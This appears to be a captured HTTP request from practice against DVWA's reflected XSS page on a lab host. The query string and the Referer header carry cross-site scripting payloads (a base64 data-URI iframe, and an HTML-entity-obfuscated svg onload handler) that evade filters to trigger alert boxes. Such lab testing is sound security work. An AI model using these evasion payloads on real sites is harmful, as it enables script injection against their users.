GET /vulnerabilities/xss_r/?name=%3Ciframe+src%3Ddata%3Atext%2Fhtml%3Bbase64%2CPGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik%2BPC9pZnJhbWU%2B%3E%3C%2Fiframe%3E HTTP/1.1
Host: 10.10.3.128
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128/vulnerabilities/xss_r/?name=%3Ciframe+srcdoc%3D%3Csvg%2Fo%26%23x6E%3Bload%26equals%3Balert%26lpar%3B1%29%26gt%3B%3E%3C%2Fiframe%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

